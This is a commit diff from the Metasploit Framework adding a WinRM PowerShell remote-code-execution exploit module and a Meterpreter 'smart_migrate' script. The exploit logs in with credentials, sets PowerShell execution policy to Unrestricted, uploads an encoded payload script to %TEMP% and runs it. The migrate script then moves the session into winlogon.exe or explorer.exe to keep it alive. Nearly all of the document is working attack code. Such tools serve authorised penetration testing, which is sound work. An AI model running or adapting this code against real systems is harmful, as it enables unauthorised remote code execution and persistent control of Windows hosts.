Adding the winrm powershell exploit

also adds the smart_migrate meterp script for autorun purposes

Author: David Maloney

modules/exploits/windows/winrm/winrm_powershell.rb

@@ -0,0 +1,146 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ManualRanking
+
+	include Msf::Exploit::Remote::WinRM
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WinRM Powershell Remote Code Execution',
+			'Description'    => %q{
+					This module uses  valid redentials to login to the WinRM service
+					and execute a payload as a powershell script. It then attempts to
+					automigrate before the WinRS shell dies.
+
+					It is important to use an x64 payload if your target system is x64.
+			},
+			'Author'         => [ 'thelightcosine' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'WfsDelay'     => 30,
+					'EXITFUNC' => 'thread',
+					'InitialAutoRunScript' => 'smart_migrate',
+				},
+			'Platform'       => 'win',
+			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
+		))
+
+	end
+
+	def check
+		print_status "Attempting to set Execution Policy"
+		unless accepts_ntlm_auth
+			print_error "The Remote WinRM  server  does not appear to allow Negotiate(NTLM) auth"
+			return Msf::Exploit::CheckCode::Safe
+		end
+
+		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
+		if streams == 401
+			print_error "Login failed!"
+			return Msf::Exploit::CheckCode::Safe
+		end
+		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
+		if streams['stdout'].include? 'Unrestricted'
+			return Msf::Exploit::CheckCode::Vulnerable
+		else
+			return Msf::Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		unless  check[0] == "vulnerable"
+			print_error "Unable to set Execution Policy"
+			return
+		end
+		path = upload_script
+		exec_script(path)
+		handler
+	end
+
+	def upload_script
+		path = temp_dir + "\\" + ::Rex::Text.rand_text_alpha(8) + ".ps1"
+		print_status "uploading powershell script to #{path} "
+
+		script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded)
+		#add a sleep to the script to give us enoguh time to establish a session
+		script << "\n Start-Sleep -s 600"
+		script.each_line do |psline|
+			#build our psh command to write out our psh script, meta eh?
+			script_line = "Add-Content #{path} '#{psline.chomp}' "
+			cmd = encoded_psh(script_line)
+			streams = winrm_run_cmd(cmd)
+		end
+		return path
+	end
+
+	def exec_script(path)
+		print_status "Attempting to execute script..."
+		cmd = "powershell -File #{path}"
+		resp,c = send_request_ntlm(winrm_open_shell_msg)
+		if resp.nil?
+			print_error "Got no reply from target"
+			return
+		end
+		unless resp.code == 200
+			print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
+			return
+		end
+		shell_id = winrm_get_shell_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
+		cmd_id = winrm_get_cmd_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
+		streams = winrm_get_cmd_streams(resp)
+	end
+
+	def encoded_psh(script)
+		script = script.chars.to_a.join("\x00").chomp
+		script << "\x00" unless script[-1].eql? "\x00"
+		if(defined?(script.encode))
+		script = script.encode('ASCII-8BIT')
+		script = Base64.strict_encode64(script)
+		else
+		script = Base64.encode64(script).chomp
+		end
+		cmd = "powershell -encodedCommand #{script}"
+	end
+
+	def temp_dir
+		print_status "Grabbing %TEMP%"
+		resp,c = send_request_ntlm(winrm_open_shell_msg)
+		unless resp.code == 200
+			print_error "Got unexpected response: \n #{resp.to_s}"
+			return
+		end
+		shell_id = winrm_get_shell_id(resp)
+		cmd = "echo %TEMP%"
+		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
+		cmd_id = winrm_get_cmd_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
+		streams = winrm_get_cmd_streams(resp)
+		return streams['stdout'].chomp
+	end
+
+end

scripts/meterpreter/smart_migrate.rb

@@ -0,0 +1,43 @@
+# $Id$
+# $Revision$
+#
+
+
+def attempt_migration(target_pid)
+	begin
+		print_good("Migrating to #{target_pid}")
+		client.core.migrate(target_pid)
+		print_good("Successfully migrated to process #{}")
+		return true
+	rescue ::Exception => e
+		print_error("Could not migrate in to process.")
+		print_error(e)
+		return false
+	end
+end
+
+if client.platform =~ /win32|win64/
+	server = client.sys.process.open
+	original_pid = server.pid
+	print_status("Current server process: #{server.name} (#{server.pid})")
+
+	uid = client.sys.config.getuid
+
+	processes = client.sys.process.get_processes
+	
+	uid_explorer_procs = []
+	explorer_procs = []
+	winlogon_procs = []
+	processes.each do |proc|
+		uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
+		explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
+		winlogon_procs << proc if proc['name'] == "winlogon.exe"
+	end
+
+	winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
+	uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
+	explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
+
+	print_error "Was unable to sucessfully migrate into any of our likely candidates"
+
+end